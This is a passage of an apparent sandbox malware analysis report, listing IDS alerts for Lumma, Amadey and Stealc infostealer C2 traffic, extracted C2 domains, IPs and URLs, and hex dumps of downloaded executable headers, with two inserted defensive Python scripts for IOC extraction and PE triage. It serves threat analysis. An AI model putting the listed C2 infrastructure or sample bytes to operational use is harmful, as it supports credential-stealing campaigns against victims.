Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49884 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49893 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49904 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:52609 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:64988 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49919 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49916 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49921 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49931 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49945 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49960 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49959 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:60841 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49979 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49994 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50008 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50033 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:50043 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:51905 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49943 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50071 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:59249 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:49153 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:63867 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:54906 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58616 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58618 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58620 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58621 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58623 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58624 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58627 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:58626 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:58629 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:58669 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49852 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49852 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49893 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49843 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49843 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49931 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49931 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58616 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58616 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:58624 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:58618 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50033 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58618 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58629 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49921 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49921 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49919 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50043 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:58627 -> 188.114.97.3:443
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor IPs: 185.215.113.43
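The Suricata alerts and the configuration-extractor lines above carry the same indicators in three different shapes: domains defanged with a space inside the rule message ("necklacedmny .store"), flows where the remote peer is sometimes the source and sometimes the destination, and bare URLs, domains and IPs from the extracted configuration. The following is an added example, not part of the report or of Joe Sandbox, that turns a handful of lines copied from this block into one deduplicated IOC table, keyed on the remote indicator, with the malware family the rule named, the SIDs that fired and the source of each entry. The sandbox host (192.168.2.4) and the resolver (1.1.1.1:53) are deliberately excluded; the family names are taken from the rule messages as written.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample: a few lines copied verbatim from the Networking block above.
REPORT_LINES = [
    "Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:63537 -> 1.1.1.1:53",
    "Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:49735 -> 188.114.97.3:443",
    "Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443",
    "Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49808",
    "Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49842 -> 185.215.113.43:80",
    "Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49890 -> 185.215.113.206:80",
    "Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php",
    "Source: Malware configuration extractor URLs: fadehairucw.store",
    "Source: Malware configuration extractor URLs: necklacedmny.store",
    "Source: Malware configuration extractor IPs: 185.215.113.43",
]

SURICATA_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d) - (?P<msg>.+?) : "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)\s*$")
# ET rule messages defang the domain with a space before the TLD: "crisiwarny .store"
DOMAIN_IN_MSG_RE = re.compile(r"\((?P<label>[a-z0-9-]+) ?\.(?P<tld>[a-z]+)(?: in TLS SNI)?\)")
CONFIG_RE = re.compile(r"Malware configuration extractor (?P<kind>URLs|IPs): (?P<value>\S+)\s*$")
FAMILY_RE = re.compile(r"Lumma|Amadey|Stealc")


def _is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def _record(iocs, value, kind, family=None, sid=None, source="suricata"):
    entry = iocs.setdefault(value, {"type": kind, "families": set(), "sids": set(), "sources": set()})
    if family:
        entry["families"].add(family)
    if sid:
        entry["sids"].add(sid)
    entry["sources"].add(source)


def extract_iocs(lines):
    """Map each remote indicator to its type, the families the rules named, the
    SIDs that fired on it and where it came from (suricata and/or config)."""
    iocs = {}
    for line in lines:
        m = SURICATA_RE.search(line)
        if m:
            fam = FAMILY_RE.search(m["msg"])
            family = fam.group(0) if fam else None
            sid = int(m["sid"])
            d = DOMAIN_IN_MSG_RE.search(m["msg"])
            if d:
                _record(iocs, f"{d['label']}.{d['tld']}", "domain", family, sid)
            for ip, port in ((m["src"], m["sport"]), (m["dst"], m["dport"])):
                # The sandbox host (private) and the resolver (port 53) are not
                # indicators; only the remote peer of the flow is.
                if ipaddress.ip_address(ip).is_private or port == "53":
                    continue
                _record(iocs, ip, "ip", family, sid)
            continue
        m = CONFIG_RE.search(line)
        if m:
            value = m["value"]
            if "://" in value:
                _record(iocs, value, "url", source="config")
                value = urlsplit(value).hostname
            _record(iocs, value, "ip" if _is_ip(value) else "domain", source="config")
    return iocs


def defang(value):
    """Render an indicator so it cannot be clicked or resolved by accident."""
    if "://" in value:
        u = urlsplit(value)
        return f"{u.scheme.replace('http', 'hxxp')}://{u.netloc.replace('.', '[.]')}{u.path}"
    return value.replace(".", "[.]")


if __name__ == "__main__":
    for value, e in sorted(extract_iocs(REPORT_LINES).items(), key=lambda kv: kv[1]["type"]):
        print(f"{e['type']:6} {defang(value):48} {','.join(sorted(e['families'])) or '-':8} "
              f"sids={sorted(e['sids'])} via={sorted(e['sources'])}")
```

Two details matter when this is extended to a full report. First, 188.114.97.3 is a shared CDN front (the SNI alerts fire on the domain, not the address), so the domain entries are the ones worth blocking and the address should be reviewed before it goes on a blocklist. Second, the configuration extractor lists domains that never resolved during the run (scriptyprefej.store, founpiuer.store, navygenerayk.store); they show up with an empty SID set, which is exactly the signal that they are fallback C2 the sandbox did not exercise.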
Source: unknown Network traffic detected: DNS query count 33
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:15:10 GMTContent-Type: application/octet-streamContent-Length: 2809344Last-Modified: Thu, 31 Oct 2024 02:58:51 GMTConnection: keep-aliveETag: "6722f26b-2ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 26 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 63 78 67 76 69 6e 73 00 80 2a 00 00 a0 00 00 00 7c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 75 6c 76 74 74 61 6c 00 20 00 00 00 20 2b 00 00 06 00 00 00 b6 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2b 00 00 22 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
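The "Data Raw" dump of the first response above (Content-Length 2809344) is a PE prefix, and the header fields it exposes are enough for a first triage before the file is ever detonated. The following is an added example, not part of the report or of Joe Sandbox: the hex is copied from that dump and cut at offset 0xf8, the end of the standard PE32 optional header, so the data directories and the six section headers that the report shows after it are not embedded and the parser reports the section table as not captured. Field offsets follow the PE/COFF layout; the only interpretation added here is the check that the entry point lies inside the declared code range, which for this dump it does not.

```python
import struct
from datetime import datetime, timezone

# First 0xf8 bytes of the 2809344-byte response above, copied from its "Data Raw"
# dump (16 bytes per line). The report shows more; it is cut here on purpose.
DATA_RAW = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68
69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00
00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00
00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00
00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00
04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00
00 80 2b 00 00 04 00 00 26 04 2b 00 02 00 60 00
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00
00 00 00 00 10 00 00 00
"""
PAYLOAD = bytes.fromhex(DATA_RAW)   # fromhex ignores the whitespace and newlines

MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "ARM64"}
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
                        0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
SUBSYSTEMS = {2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}
SECTION_WRITE, SECTION_EXECUTE = 0x80000000, 0x20000000


def parse_pe_prefix(data):
    """Parse what a truncated PE prefix allows: DOS header, COFF header, PE32
    optional header, and as many section headers as were captured."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic != 0x10B:
        raise ValueError(f"only PE32 is handled here, magic=0x{magic:x}")
    # Standard + Windows-specific fields after Magic/linker version (68 bytes).
    (size_code, _, _, entry, base_code, _, image_base, sect_align, file_align,
     _, _, _, _, _, _, _, size_image, _, _, subsystem, dllchars) = struct.unpack_from(
        "<IIIIIIIIIHHHHHHIIIIHH", data, opt + 4)
    sections = []
    off = opt + opt_size                    # section table follows the optional header
    for _ in range(nsections):
        if off + 40 > len(data):            # dump ends before this header: stop, do not guess
            break
        name, vsize, va, raw_size, raw_ptr, sc = struct.unpack_from("<8sIIII12xI", data, off)
        stripped = name.rstrip(b"\0")
        sections.append({
            "name": stripped.decode("latin-1"), "va": va, "vsize": vsize,
            "raw_ptr": raw_ptr, "raw_size": raw_size,
            "write_exec": bool(sc & SECTION_WRITE) and bool(sc & SECTION_EXECUTE),
            "odd_name": not all(32 < b < 127 for b in stripped),   # spaces, NULs, non-ASCII
        })
        off += 40
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "sections_declared": nsections,
        "sections_captured": len(sections),
        "section_table_truncated": len(sections) < nsections,
        "timestamp": timestamp,
        "compiled_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "characteristics": [n for bit, n in FILE_CHARACTERISTICS.items() if chars & bit],
        "entry_point": entry,
        "entry_outside_code": not (base_code <= entry < base_code + size_code),
        "image_base": image_base,
        "section_alignment": sect_align,
        "file_alignment": file_align,
        "size_of_image": size_image,
        "subsystem": SUBSYSTEMS.get(subsystem, subsystem),
        "dll_characteristics": dllchars,
        "sections": sections,
    }


if __name__ == "__main__":
    info = parse_pe_prefix(PAYLOAD)
    for key, value in info.items():
        if key != "sections":
            print(f"{key:24} {value:#x}" if type(value) is int else f"{key:24} {value}")
    for s in info["sections"]:
        print(f"  {s['name']!r:12} va={s['va']:#x} raw={s['raw_ptr']:#x}+{s['raw_size']:#x}"
              f" write+exec={s['write_exec']} odd_name={s['odd_name']}")
```

Feeding the full dump from the report into DATA_RAW instead of the prefix makes the section loop return the six headers, where the odd_name and write_exec flags correspond to the report's own "PE file contains section with special chars" and "PE file has a writeable .text section" signatures; with the prefix alone the useful output is the i386 target, the 2023-10-15 link timestamp, a SizeOfImage of 0x2b8000 against a 2809344-byte download, and an entry point at 0x2b4000 far outside the 0x2400-byte code range declared from 0x2000, which is the usual footprint of a packer stub.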
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:15:14 GMTContent-Type: application/octet-streamContent-Length: 1873920Last-Modified: Thu, 31 Oct 2024 03:03:32 GMTConnection: keep-aliveETag: "6722f384-1c9800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4a 00 00 04 00 00 90 ae 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 27 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 27 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 
90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6c 65 67 6c 70 6a 70 00 80 19 00 00 b0 30 00 00 7c 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 7a 6e 63 62 64 65 77 00 10 00 00 00 30 4a 00 00 04 00 00 00 72 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4a 00 00 22 00 00 00 76 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
